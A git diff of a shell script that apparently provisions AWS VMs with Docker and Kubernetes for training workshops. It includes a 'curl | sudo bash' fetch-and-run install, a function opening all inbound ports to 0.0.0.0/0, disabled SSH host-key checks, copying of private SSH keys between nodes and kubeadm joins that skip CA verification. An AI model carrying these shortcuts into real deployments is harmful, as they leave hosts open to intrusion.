find_ubuntu_ami -r $AWS_DEFAULT_REGION "$@"
}
_cmd ami "Show the AMI that will be used for deployment"
_cmd_ami() {
find_ubuntu_ami -r $AWS_DEFAULT_REGION -a amd64 -v 16.04 -t hvm:ebs -N -q
}
_cmd build "Build the Docker image to run this program in a container"
_cmd_build() {
docker-compose build
@@ -22,67 +32,70 @@ _cmd_wrap() {
docker-compose run --rm workshopctl "$@"
}
_cmd cards "Generate ready-to-print cards for a group of VMs"
_cmd cards "Generate ready-to-print cards for a batch of VMs"
_cmd_cards() {
TAG=$1
need_tag
SETTINGS=$2
need_tag $TAG
need_settings $SETTINGS
# This will process ips.txt to generate two files: ips.pdf and ips.html
(
cd tags/$TAG
../../lib/ips-txt-to-html.py settings.yaml
)
aws_get_instance_ips_by_tag $TAG >tags/$TAG/ips.txt
ln -sf ../tags/$TAG/ips.html www/$TAG.html
ln -sf ../tags/$TAG/ips.pdf www/$TAG.pdf
# Remove symlinks to old cards
rm -f ips.html ips.pdf
# This will generate two files in the base dir: ips.pdf and ips.html
python lib/ips-txt-to-html.py $SETTINGS
for f in ips.html ips.pdf; do
# Remove old versions of cards if they exist
rm -f tags/$TAG/$f
# Move the generated file and replace it with a symlink
mv -f $f tags/$TAG/$f && ln -s tags/$TAG/$f $f
done
info "Cards created. You can view them with:"
info "xdg-open tags/$TAG/ips.html tags/$TAG/ips.pdf (on Linux)"
info "open tags/$TAG/ips.html (on macOS)"
info "Or you can start a web server with:"
info "$0 www"
info "xdg-open ips.html ips.pdf (on Linux)"
info "open ips.html ips.pdf (on MacOS)"
}
_cmd deploy "Install Docker on a bunch of running VMs"
_cmd_deploy() {
TAG=$1
need_tag
SETTINGS=$2
need_tag $TAG
need_settings $SETTINGS
link_tag $TAG
count=$(wc -l ips.txt)
# wait until all hosts are reachable before trying to deploy
info "Trying to reach $TAG instances..."
while ! tag_is_reachable; do
while ! tag_is_reachable $TAG; do
>/dev/stderr echo -n "."
sleep 2
done
>/dev/stderr echo ""
echo deploying > tags/$TAG/status
sep "Deploying tag $TAG"
# Wait for cloudinit to be done
pssh "
while [ ! -f /var/lib/cloud/instance/boot-finished ]; do
sleep 1
done"
# Copy settings and install Python YAML parser
pssh -I tee /tmp/settings.yaml <tags/$TAG/settings.yaml
pssh -I tee /tmp/settings.yaml <$SETTINGS
pssh "
sudo apt-get update &&
sudo apt-get install -y python-yaml"
sudo apt-get install -y python-setuptools &&
sudo easy_install pyyaml"
# Copy postprep.py to the remote machines, and execute it, feeding it the list of IP addresses
pssh -I tee /tmp/postprep.py <lib/postprep.py
pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" <tags/$TAG/ips.txt
pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" <ips.txt
# Install docker-prompt script
pssh -I sudo tee /usr/local/bin/docker-prompt <lib/docker-prompt
pssh sudo chmod +x /usr/local/bin/docker-prompt
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from the first node
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from node1
pssh "
sudo -u docker [ -f /home/docker/.ssh/id_rsa ] ||
ssh -o StrictHostKeyChecking=no \$(cat /etc/name_of_first_node) sudo -u docker tar -C /home/docker -cvf- .ssh |
ssh -o StrictHostKeyChecking=no node1 sudo -u docker tar -C /home/docker -cvf- .ssh |
sudo -u docker tar -C /home/docker -xf-"
# if 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, copy it there
@@ -91,100 +104,46 @@ _cmd_deploy() {
cat /home/docker/.ssh/id_rsa.pub |
sudo -u docker tee -a /home/docker/.ssh/authorized_keys"
# On the first node, create and deploy TLS certs using Docker Machine
# On node1, create and deploy TLS certs using Docker Machine
# (Currently disabled.)
true || pssh "
if i_am_first_node; then
grep '[0-9]\$' /etc/hosts |
if grep -q node1 /tmp/node; then
grep ' node' /etc/hosts |
xargs -n2 sudo -H -u docker \
docker-machine create -d generic --generic-ssh-user docker --generic-ip-address
fi"
sep "Deployed tag $TAG"
echo deployed > tags/$TAG/status
info "You may want to run one of the following commands:"
info "$0 kube $TAG"
info "$0 pull_images $TAG"
info "$0 cards $TAG"
}
_cmd disabledocker "Stop Docker Engine and don't restart it automatically"
_cmd_disabledocker() {
TAG=$1
need_tag
pssh "
sudo systemctl disable docker.service
sudo systemctl disable docker.socket
sudo systemctl stop docker
sudo killall containerd
"
}
_cmd kubebins "Install Kubernetes and CNI binaries but don't start anything"
_cmd_kubebins() {
TAG=$1
need_tag
pssh --timeout 300 "
set -e
cd /usr/local/bin
if ! [ -x etcd ]; then
##VERSION##
curl -L https://github.com/etcd-io/etcd/releases/download/v3.4.3/etcd-v3.4.3-linux-amd64.tar.gz \
| sudo tar --strip-components=1 --wildcards -zx '*/etcd' '*/etcdctl'
fi
if ! [ -x hyperkube ]; then
##VERSION##
curl -L https://dl.k8s.io/v1.17.2/kubernetes-server-linux-amd64.tar.gz \
| sudo tar --strip-components=3 -zx \
kubernetes/server/bin/kube{ctl,let,-proxy,-apiserver,-scheduler,-controller-manager}
fi
sudo mkdir -p /opt/cni/bin
cd /opt/cni/bin
if ! [ -x bridge ]; then
curl -L https://github.com/containernetworking/plugins/releases/download/v0.7.6/cni-plugins-amd64-v0.7.6.tgz \
| sudo tar -zx
fi
"
info "$0 cards $TAG $SETTINGS"
}
_cmd kube "Setup kubernetes clusters with kubeadm (must be run AFTER deploy)"
_cmd_kube() {
TAG=$1
need_tag
# Optional version, e.g. 1.13.5
KUBEVERSION=$2
if [ "$KUBEVERSION" ]; then
EXTRA_APTGET="=$KUBEVERSION-00"
EXTRA_KUBEADM="--kubernetes-version=v$KUBEVERSION"
else
EXTRA_APTGET=""
EXTRA_KUBEADM=""
fi
# Install packages
pssh --timeout 200 "
pssh "
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg |
sudo apt-key add - &&
echo deb http://apt.kubernetes.io/ kubernetes-xenial main |
sudo tee /etc/apt/sources.list.d/kubernetes.list"
pssh --timeout 200 "
pssh "
sudo apt-get update -q &&
sudo apt-get install -qy kubelet$EXTRA_APTGET kubeadm$EXTRA_APTGET kubectl$EXTRA_APTGET &&
sudo apt-get install -qy kubelet kubeadm kubectl
kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl"
# Initialize kube master
pssh --timeout 200 "
if i_am_first_node && [ ! -f /etc/kubernetes/admin.conf ]; then
kubeadm token generate > /tmp/token &&
sudo kubeadm init $EXTRA_KUBEADM --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
pssh "
if grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/admin.conf ]; then
kubeadm token generate > /tmp/token
sudo kubeadm init --token \$(cat /tmp/token)
fi"
# Put kubeconfig in ubuntu's and docker's accounts
pssh "
if i_am_first_node; then
if grep -q node1 /tmp/node; then
sudo mkdir -p \$HOME/.kube /home/docker/.kube &&
sudo cp /etc/kubernetes/admin.conf \$HOME/.kube/config &&
sudo cp /etc/kubernetes/admin.conf /home/docker/.kube/config &&
@@ -194,103 +153,22 @@ _cmd_kube() {
# Install weave as the pod network
pssh "
if i_am_first_node; then
kubever=\$(kubectl version | base64 | tr -d '\n') &&
if grep -q node1 /tmp/node; then
kubever=\$(kubectl version | base64 | tr -d '\n')
kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=\$kubever
fi"
# Join the other nodes to the cluster
pssh --timeout 200 "
if ! i_am_first_node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
FIRSTNODE=\$(cat /etc/name_of_first_node) &&
TOKEN=\$(ssh -o StrictHostKeyChecking=no \$FIRSTNODE cat /tmp/token) &&
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN \$FIRSTNODE:6443
fi"
# Install metrics server
pssh "
if i_am_first_node; then
kubectl apply -f https://raw.githubusercontent.com/jpetazzo/container.training/master/k8s/metrics-server.yaml
fi"
# Install kubectx and kubens
pssh "
[ -d kubectx ] || git clone https://github.com/ahmetb/kubectx &&
sudo ln -sf /home/ubuntu/kubectx/kubectx /usr/local/bin/kctx &&
sudo ln -sf /home/ubuntu/kubectx/kubens /usr/local/bin/kns &&
sudo cp /home/ubuntu/kubectx/completion/*.bash /etc/bash_completion.d &&
[ -d kube-ps1 ] || git clone https://github.com/jonmosco/kube-ps1 &&
sudo -u docker sed -i s/docker-prompt/kube_ps1/ /home/docker/.bashrc &&
sudo -u docker tee -a /home/docker/.bashrc <<EOF
. /home/ubuntu/kube-ps1/kube-ps1.sh
KUBE_PS1_PREFIX=""
KUBE_PS1_SUFFIX=""
KUBE_PS1_SYMBOL_ENABLE="false"
KUBE_PS1_CTX_COLOR="green"
KUBE_PS1_NS_COLOR="green"
EOF"
# Install stern
pssh "
if [ ! -x /usr/local/bin/stern ]; then
##VERSION##
sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.11.0/stern_linux_amd64 &&
sudo chmod +x /usr/local/bin/stern &&
stern --completion bash | sudo tee /etc/bash_completion.d/stern
fi"
# Install helm
pssh "
if [ ! -x /usr/local/bin/helm ]; then
curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get-helm-3 | sudo bash &&
helm completion bash | sudo tee /etc/bash_completion.d/helm
fi"
# Install ship
pssh "
if [ ! -x /usr/local/bin/ship ]; then
##VERSION##
curl -L https://github.com/replicatedhq/ship/releases/download/v0.40.0/ship_0.40.0_linux_amd64.tar.gz |
sudo tar -C /usr/local/bin -zx ship
fi"
# Install the AWS IAM authenticator
pssh "
if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
##VERSION##
sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
sudo chmod +x /usr/local/bin/aws-iam-authenticator
if ! grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
TOKEN=\$(ssh -o StrictHostKeyChecking=no node1 cat /tmp/token)
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN node1:6443
fi"
sep "Done"
}
_cmd kubereset "Wipe out Kubernetes configuration on all nodes"
_cmd_kubereset() {
TAG=$1
need_tag
pssh "sudo kubeadm reset --force"
}
_cmd kubetest "Check that all nodes are reporting as Ready"
_cmd_kubetest() {
TAG=$1
need_tag
# There are way too many backslashes in the command below.
# Feel free to make that better ♥
pssh "
set -e
if i_am_first_node; then
which kubectl
for NODE in \$(awk /[0-9]\$/\ {print\ \\\$2} /etc/hosts); do
echo \$NODE ; kubectl get nodes | grep -w \$NODE | grep -w Ready
done
fi"
}
_cmd ids "(FIXME) List the instance IDs belonging to a given tag or token"
_cmd ids "List the instance IDs belonging to a given tag or token"
_cmd_ids() {
TAG=$1
need_tag $TAG
@@ -303,398 +181,247 @@ _cmd_ids() {
aws_get_instance_ids_by_client_token $TAG
}
_cmd list "List available groups for a given infrastructure"
_cmd ips "List the IP addresses of the VMs for a given tag or token"
_cmd_ips() {
TAG=$1
need_tag $TAG
mkdir -p tags/$TAG
aws_get_instance_ips_by_tag $TAG | tee tags/$TAG/ips.txt
link_tag $TAG
}
_cmd list "List available batches in the current region"
_cmd_list() {
need_infra $1
infra_list
info "Listing batches in region $AWS_DEFAULT_REGION:"
aws_display_tags
}
_cmd listall "List VMs running on all configured infrastructures"
_cmd_listall() {
for infra in infra/*; do
case $infra in
infra/example.*)
;;
*)
info "Listing infrastructure $infra:"
need_infra $infra
infra_list
;;
esac
done
}
_cmd maketag "Generate a quasi-unique tag for a group of instances"
_cmd_maketag() {
if [ -z $USER ]; then
export USER=anonymous
fi
MS=$(($(date +%N)/1000000))
date +%Y-%m-%d-%H-%M-$MS-$USER
}
_cmd ping "Ping VMs in a given tag, to check that they have network access"
_cmd_ping() {
_cmd status "List instance status for a given batch"
_cmd_status() {
info "Using region $AWS_DEFAULT_REGION."
TAG=$1
need_tag
fping < tags/$TAG/ips.txt
}
_cmd netfix "Disable GRO and run a pinger job on the VMs"
_cmd_netfix () {
TAG=$1
need_tag
pssh "
sudo ethtool -K ens3 gro off
sudo tee /root/pinger.service <<EOF
[Unit]
Description=pinger
[Install]
WantedBy=multi-user.target
[Service]
WorkingDirectory=/
ExecStart=/bin/ping -w60 1.1
User=nobody
Group=nogroup
Restart=always
EOF
sudo systemctl enable /root/pinger.service
sudo systemctl start pinger"
}
_cmd tailhist "Install history viewer on port 1088"
_cmd_tailhist () {
TAG=$1
need_tag
pssh "
wget https://github.com/joewalnes/websocketd/releases/download/v0.3.0/websocketd-0.3.0_amd64.deb
sudo dpkg -i websocketd-0.3.0_amd64.deb
sudo mkdir -p /tmp/tailhist
sudo tee /root/tailhist.service <<EOF
[Unit]
Description=tailhist
[Install]
WantedBy=multi-user.target
[Service]
WorkingDirectory=/tmp/tailhist
ExecStart=/usr/bin/websocketd --port=1088 --staticdir=. sh -c \"tail -n +1 -f /home/docker/.history || echo 'Could not read history file. Perhaps you need to \\\"chmod +r .history\\\"?'\"
User=nobody
Group=nogroup
Restart=always
EOF
sudo systemctl enable /root/tailhist.service
sudo systemctl start tailhist"
pssh -I sudo tee /tmp/tailhist/index.html <lib/tailhist.html
need_tag $TAG
describe_tag $TAG
tag_is_reachable $TAG
info "You may be interested in running one of the following commands:"
info "$0 ips $TAG"
info "$0 deploy $TAG <settings/somefile.yaml>"
}
_cmd opensg "Open the default security group to ALL ingress traffic"
_cmd_opensg() {
need_infra $1
infra_opensg
}
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol icmp \
--port -1 \
--cidr 0.0.0.0/0
_cmd portworx "Prepare the nodes for Portworx deployment"
_cmd_portworx() {
TAG=$1
need_tag
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol udp \
--port 0-65535 \
--cidr 0.0.0.0/0
pssh "
sudo truncate --size 10G /portworx.blk &&
sudo losetup /dev/loop4 /portworx.blk"
}
_cmd disableaddrchecks "Disable source/destination IP address checks"
_cmd_disableaddrchecks() {
TAG=$1
need_tag
infra_disableaddrchecks
}
_cmd pssh "Run an arbitrary command on all nodes"
_cmd_pssh() {
TAG=$1
need_tag
shift
pssh "$@"
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol tcp \
--port 0-65535 \
--cidr 0.0.0.0/0
}
_cmd pull_images "Pre-pull a bunch of Docker images"
_cmd_pull_images() {
TAG=$1
need_tag
pull_tag
need_tag $TAG
pull_tag $TAG
}
_cmd remap_nodeports "Remap NodePort range to 10000-10999"
_cmd_remap_nodeports() {
TAG=$1
need_tag
FIND_LINE=" - --service-cluster-ip-range=10.96.0.0\/12"
ADD_LINE=" - --service-node-port-range=10000-10999"
MANIFEST_FILE=/etc/kubernetes/manifests/kube-apiserver.yaml
pssh "
if i_am_first_node && ! grep -q '$ADD_LINE' $MANIFEST_FILE; then
sudo sed -i 's/\($FIND_LINE\)\$/\1\n$ADD_LINE/' $MANIFEST_FILE
fi"
}
_cmd quotas "Check our infrastructure quotas (max instances)"
_cmd_quotas() {
need_infra $1
infra_quotas
}
_cmd retag "(FIXME) Apply a new tag to a group of VMs"
_cmd retag "Apply a new tag to a batch of VMs"
_cmd_retag() {
OLDTAG=$1
NEWTAG=$2
TAG=$OLDTAG
need_tag
need_tag $OLDTAG
if [[ -z "$NEWTAG" ]]; then
die "You must specify a new tag to apply."
fi
aws_tag_instances $OLDTAG $NEWTAG
}
_cmd ssh "Open an SSH session to the first node of a tag"
_cmd_ssh() {
TAG=$1
need_tag
IP=$(head -1 tags/$TAG/ips.txt)
info "Logging into $IP"
ssh docker@$IP
}
_cmd start "Start a group of VMs"
_cmd start "Start a batch of VMs"
_cmd_start() {
while [ ! -z "$*" ]; do
case "$1" in
--infra) INFRA=$2; shift 2;;
--settings) SETTINGS=$2; shift 2;;
--count) COUNT=$2; shift 2;;
--tag) TAG=$2; shift 2;;
*) die "Unrecognized parameter: $1."
esac
done
# Number of instances to create
COUNT=$1
# Optional settings file (to carry on with deployment)
SETTINGS=$2
if [ -z "$INFRA" ]; then
die "Please add --infra flag to specify which infrastructure file to use."
fi
if [ -z "$SETTINGS" ]; then
die "Please add --settings flag to specify which settings file to use."
fi
if [ -z "$COUNT" ]; then
COUNT=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
warning "No --count option was specified. Using value from settings file ($COUNT)."
die "Indicate number of instances to start."
fi
# Check that the specified settings and infrastructure are valid.
need_settings $SETTINGS
need_infra $INFRA
# Print our AWS username, to ease the pain of credential-juggling
greet
if [ -z "$TAG" ]; then
TAG=$(_cmd_maketag)
# Upload our SSH keys to AWS if needed, to be added to each VM's authorized_keys
key_name=$(sync_keys)
AMI=$(_cmd_ami) # Retrieve the AWS image ID
if [ -z "$AMI" ]; then
die "I could not find which AMI to use in this region. Try another region?"
fi
mkdir -p tags/$TAG
ln -s ../../$INFRA tags/$TAG/infra.sh
ln -s ../../$SETTINGS tags/$TAG/settings.yaml
echo creating > tags/$TAG/status
TOKEN=$(get_token) # generate a timestamp token for this batch of VMs
AWS_KEY_NAME=$(make_key_name)
sep "Starting instances"
info " Count: $COUNT"
info " Region: $AWS_DEFAULT_REGION"
info " Token/tag: $TOKEN"
info " AMI: $AMI"
info " Key name: $AWS_KEY_NAME"
result=$(aws ec2 run-instances \
--key-name $AWS_KEY_NAME \
--count $COUNT \
--instance-type t2.medium \
--client-token $TOKEN \
--image-id $AMI)
reservation_id=$(echo "$result" | head -1 | awk '{print $2}')
info "Reservation ID: $reservation_id"
sep
# if instance creation succeeded, we should have some IDs
IDS=$(aws_get_instance_ids_by_client_token $TOKEN)
if [ -z "$IDS" ]; then
die "Instance creation failed."
fi
# Tag these new instances with a tag that is the same as the token
TAG=$TOKEN
aws_tag_instances $TOKEN $TAG
wait_until_tag_is_running $TAG $COUNT
infra_start $COUNT
sep
info "Successfully created $COUNT instances with tag $TAG"
sep
echo created > tags/$TAG/status
info "To deploy Docker on these instances, you can run:"
info "$0 deploy $TAG"
info "To terminate these instances, you can run:"
info "$0 stop $TAG"
mkdir -p tags/$TAG
IPS=$(aws_get_instance_ips_by_tag $TAG)
echo "$IPS" >tags/$TAG/ips.txt
link_tag $TAG
if [ -n "$SETTINGS" ]; then
_cmd_deploy $TAG $SETTINGS
else
info "To deploy or kill these instances, run one of the following:"
info "$0 deploy $TAG <settings/somefile.yaml>"
info "$0 stop $TAG"
fi
}
_cmd ec2quotas "Check our EC2 quotas (max instances)"
_cmd_ec2quotas() {
greet
max_instances=$(aws ec2 describe-account-attributes \
--attribute-names max-instances \
--query 'AccountAttributes[*][AttributeValues]')
info "In the current region ($AWS_DEFAULT_REGION) you can deploy up to $max_instances instances."
# Print list of AWS EC2 regions, highlighting ours ($AWS_DEFAULT_REGION) in the list
# If our $AWS_DEFAULT_REGION is not valid, the error message will be pretty descriptive:
# Could not connect to the endpoint URL: "https://ec2.foo.amazonaws.com/"
info "Available regions:"
aws ec2 describe-regions | awk '{print $3}' | grep --color=auto $AWS_DEFAULT_REGION -C50
}
_cmd stop "Stop (terminate, shutdown, kill, remove, destroy...) instances"
_cmd_stop() {
TAG=$1
need_tag
infra_stop
echo stopped > tags/$TAG/status
need_tag $TAG
aws_kill_instances_by_tag $TAG
}
_cmd tags "List groups of VMs known locally"
_cmd_tags() {
(
cd tags
echo "[#] [Status] [Tag] [Infra]" \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
for tag in *; do
if [ -f $tag/ips.txt ]; then
count="$(wc -l < $tag/ips.txt)"
else
count="?"
fi
if [ -f $tag/status ]; then
status="$(cat $tag/status)"
else
status="?"
fi
if [ -f $tag/infra.sh ]; then
infra="$(basename $(readlink $tag/infra.sh))"
else
infra="?"
fi
echo "$count $status $tag $infra" \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
done
)
}
_cmd test "Run tests (pre-flight checks) on a group of VMs"
_cmd test "Run tests (pre-flight checks) on a batch of VMs"
_cmd_test() {
TAG=$1
need_tag
test_tag
need_tag $TAG
test_tag $TAG
}
_cmd tmux "Log into the first node and start a tmux server"
_cmd_tmux() {
TAG=$1
need_tag
IP=$(head -1 tags/$TAG/ips.txt)
info "Opening ssh+tmux with $IP"
rm -f /tmp/tmux-$UID/default
ssh -t -L /tmp/tmux-$UID/default:/tmp/tmux-1001/default docker@$IP tmux new-session -As 0
}
_cmd helmprom "Install Helm and Prometheus"
_cmd_helmprom() {
TAG=$1
need_tag
pssh "
if i_am_first_node; then
sudo -u docker -H helm repo add stable https://kubernetes-charts.storage.googleapis.com/
sudo -u docker -H helm install prometheus stable/prometheus \
--namespace kube-system \
--set server.service.type=NodePort \
--set server.service.nodePort=30090 \
--set server.persistentVolume.enabled=false \
--set alertmanager.enabled=false
fi"
}
# Sometimes, weave fails to come up on some nodes.
# Symptom: the pods on a node are unreachable (they don't even ping).
# Remedy: wipe out Weave state and delete weave pod on that node.
# Specifically, identify the weave pod that is defective, then:
# kubectl -n kube-system exec weave-net-XXXXX -c weave rm /weavedb/weave-netdata.db
# kubectl -n kube-system delete pod weave-net-XXXXX
_cmd weavetest "Check that weave seems properly setup"
_cmd_weavetest() {
TAG=$1
need_tag
pssh "
kubectl -n kube-system get pods -o name | grep weave | cut -d/ -f2 |
xargs -I POD kubectl -n kube-system exec POD -c weave -- \
sh -c \"./weave --local status | grep Connections | grep -q ' 1 failed' || ! echo POD \""
}
_cmd webssh "Install a WEB SSH server on the machines (port 1080)"
_cmd_webssh() {
TAG=$1
need_tag
pssh "
sudo apt-get update &&
sudo apt-get install python-tornado python-paramiko -y"
pssh "
[ -d webssh ] || git clone https://github.com/jpetazzo/webssh"
pssh "
for KEYFILE in /etc/ssh/*.pub; do
read a b c < \$KEYFILE; echo localhost \$a \$b
done > webssh/known_hosts"
pssh "cat >webssh.service <<EOF
[Unit]
Description=webssh
[Install]
WantedBy=multi-user.target
[Service]
WorkingDirectory=/home/ubuntu/webssh
ExecStart=/usr/bin/env python run.py --fbidhttp=false --port=1080 --policy=reject
User=nobody
Group=nogroup
Restart=always
EOF"
pssh "
sudo systemctl enable \$PWD/webssh.service &&
sudo systemctl start webssh.service"
}
_cmd www "Run a web server to access card HTML and PDF"
_cmd_www() {
cd www
IPADDR=$(curl -sL canihazip.com/s)
info "The following files are available:"
for F in *; do
echo "http://$IPADDR:8000/$F"
done
info "Press Ctrl-C to stop server."
python3 -m http.server
}
###
greet() {
IAMUSER=$(aws iam get-user --query 'User.UserName')
info "Hello! You seem to be UNIX user $USER, and IAM user $IAMUSER."
}
link_tag() {
TAG=$1
need_tag $TAG
IPS_FILE=tags/$TAG/ips.txt
need_ips_file $IPS_FILE
ln -sf $IPS_FILE ips.txt
}
pull_tag() {
TAG=$1
need_tag $TAG
link_tag $TAG
if [ ! -s $IPS_FILE ]; then
die "Nonexistent or empty IPs file $IPS_FILE."
fi
# Pre-pull a bunch of images
pssh --timeout 900 'for I in \
debian:latest \
ubuntu:latest \
fedora:latest \
centos:latest \
elasticsearch:2 \
postgres \
redis \
alpine \
registry \
nicolaka/netshoot \
jpetazzo/trainingwheels \
golang \
training/namer \
dockercoins/hasher \
dockercoins/rng \
dockercoins/webui \
dockercoins/worker \
logstash \
prom/node-exporter \
google/cadvisor \
dockersamples/visualizer \
nathanleclaire/redisonrails; do
debian:latest \
ubuntu:latest \
fedora:latest \
centos:latest \
postgres \
redis \
training/namer \
nathanleclaire/redisonrails; do
sudo -u docker docker pull $I
done'
info "Finished pulling images for $TAG."
info "You may now want to run:"
info "$0 cards $TAG <settings/somefile.yaml>"
}
wait_until_tag_is_running() {
max_retry=50
TAG=$1
COUNT=$2
i=0
done_count=0
while [[ $done_count -lt $COUNT ]]; do
let "i += 1"
info "$(printf "%d/%d instances online" $done_count $COUNT)"
done_count=$(aws ec2 describe-instances \
--filters "Name=instance-state-name,Values=running" \
"Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].State.Name" \
| tr "\t" "\n" \
| wc -l)
if [[ $i -gt $max_retry ]]; then
die "Timed out while waiting for instance creation (after $max_retry retries)"
fi
sleep 1
done
}
tag_is_reachable() {
TAG=$1
need_tag $TAG
link_tag $TAG
pssh -t 5 true 2>&1 >/dev/null
}
test_tag() {
ips_file=tags/$TAG/ips.txt
info "Picking a random IP address in $ips_file to run tests."
ip=$(shuf -n1 $ips_file)
n=$((1 + $RANDOM % $(wc -l <$ips_file)))
ip=$(head -n $n $ips_file | tail -n 1)
test_vm $ip
info "Tests complete."
}
@@ -708,8 +435,8 @@ test_vm() {
for cmd in "hostname" \
"whoami" \
"hostname -i" \
"ls -l /usr/local/bin/i_am_first_node" \
"grep . /etc/name_of_first_node /etc/ipv4_of_first_node" \
"cat /tmp/node" \
"cat /tmp/ipv4" \
"cat /etc/hosts" \
"hostnamectl status" \
"docker version | grep Version -B1" \
@@ -769,3 +496,18 @@ sync_keys() {
info "Using existing key $AWS_KEY_NAME."
fi
}
get_token() {
if [ -z $USER ]; then
export USER=anonymous
fi
date +%Y-%m-%d-%H-%M-$USER
}
describe_tag() {
# Display instance details and reachability/status information
TAG=$1
need_tag $TAG
aws_display_instances_by_tag $TAG
aws_display_instance_statuses_by_tag $TAG
}

View File

@@ -1,30 +0,0 @@
# Default stub functions for infrastructure libraries.
# When loading an infrastructure library, these functions will be overridden.
infra_list() {
warning "infra_list is unsupported on $INFRACLASS."
}
infra_quotas() {
warning "infra_quotas is unsupported on $INFRACLASS."
}
infra_start() {
warning "infra_start is unsupported on $INFRACLASS."
}
infra_stop() {
warning "infra_stop is unsupported on $INFRACLASS."
}
infra_quotas() {
warning "infra_quotas is unsupported on $INFRACLASS."
}
infra_opensg() {
warning "infra_opensg is unsupported on $INFRACLASS."
}
infra_disableaddrchecks() {
warning "infra_disableaddrchecks is unsupported on $INFRACLASS."
}

View File

@@ -1,216 +0,0 @@
infra_list() {
aws_display_tags
}
infra_quotas() {
greet
max_instances=$(aws ec2 describe-account-attributes \
--attribute-names max-instances \
--query 'AccountAttributes[*][AttributeValues]')
info "In the current region ($AWS_DEFAULT_REGION) you can deploy up to $max_instances instances."
# Print list of AWS EC2 regions, highlighting ours ($AWS_DEFAULT_REGION) in the list
# If our $AWS_DEFAULT_REGION is not valid, the error message will be pretty descriptive:
# Could not connect to the endpoint URL: "https://ec2.foo.amazonaws.com/"
info "Available regions:"
aws ec2 describe-regions | awk '{print $3}' | grep --color=auto $AWS_DEFAULT_REGION -C50
}
infra_start() {
COUNT=$1
# Print our AWS username, to ease the pain of credential-juggling
greet
# Upload our SSH keys to AWS if needed, to be added to each VM's authorized_keys
key_name=$(sync_keys)
AMI=$(aws_get_ami) # Retrieve the AWS image ID
if [ -z "$AMI" ]; then
die "I could not find which AMI to use in this region. Try another region?"
fi
AWS_KEY_NAME=$(make_key_name)
AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}
sep "Starting instances"
info " Count: $COUNT"
info " Region: $AWS_DEFAULT_REGION"
info " Token/tag: $TAG"
info " AMI: $AMI"
info " Key name: $AWS_KEY_NAME"
info " Instance type: $AWS_INSTANCE_TYPE"
result=$(aws ec2 run-instances \
--key-name $AWS_KEY_NAME \
--count $COUNT \
--instance-type $AWS_INSTANCE_TYPE \
--client-token $TAG \
--block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
--image-id $AMI)
reservation_id=$(echo "$result" | head -1 | awk '{print $2}')
info "Reservation ID: $reservation_id"
sep
# if instance creation succeeded, we should have some IDs
IDS=$(aws_get_instance_ids_by_client_token $TAG)
if [ -z "$IDS" ]; then
die "Instance creation failed."
fi
# Tag these new instances with a tag that is the same as the token
aws_tag_instances $TAG $TAG
# Wait until EC2 API tells us that the instances are running
wait_until_tag_is_running $TAG $COUNT
aws_get_instance_ips_by_tag $TAG > tags/$TAG/ips.txt
}
infra_stop() {
aws_kill_instances_by_tag
}
infra_opensg() {
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol icmp \
--port -1 \
--cidr 0.0.0.0/0
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol udp \
--port 0-65535 \
--cidr 0.0.0.0/0
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol tcp \
--port 0-65535 \
--cidr 0.0.0.0/0
}
infra_disableaddrchecks() {
IDS=$(aws_get_instance_ids_by_tag $TAG)
for ID in $IDS; do
info "Disabling source/destination IP checks on: $ID"
aws ec2 modify-instance-attribute --source-dest-check "{\"Value\": false}" --instance-id $ID
done
}
wait_until_tag_is_running() {
max_retry=100
i=0
done_count=0
while [[ $done_count -lt $COUNT ]]; do
let "i += 1"
info "$(printf "%d/%d instances online" $done_count $COUNT)"
done_count=$(aws ec2 describe-instances \
--filters "Name=tag:Name,Values=$TAG" \
"Name=instance-state-name,Values=running" \
--query "length(Reservations[].Instances[])")
if [[ $i -gt $max_retry ]]; then
die "Timed out while waiting for instance creation (after $max_retry retries)"
fi
sleep 1
done
}
aws_display_tags() {
# Print all "Name" tags in our region with their instance count
echo "[#] [Status] [Token] [Tag]" \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
aws ec2 describe-instances \
--query "Reservations[*].Instances[*].[State.Name,ClientToken,Tags[0].Value]" \
| tr -d "\r" \
| uniq -c \
| sort -k 3 \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
}
aws_get_tokens() {
aws ec2 describe-instances --output text \
--query 'Reservations[*].Instances[*].[ClientToken]' \
| sort -u
}
aws_display_instance_statuses_by_tag() {
IDS=$(aws ec2 describe-instances \
--filters "Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].InstanceId" | tr '\t' ' ')
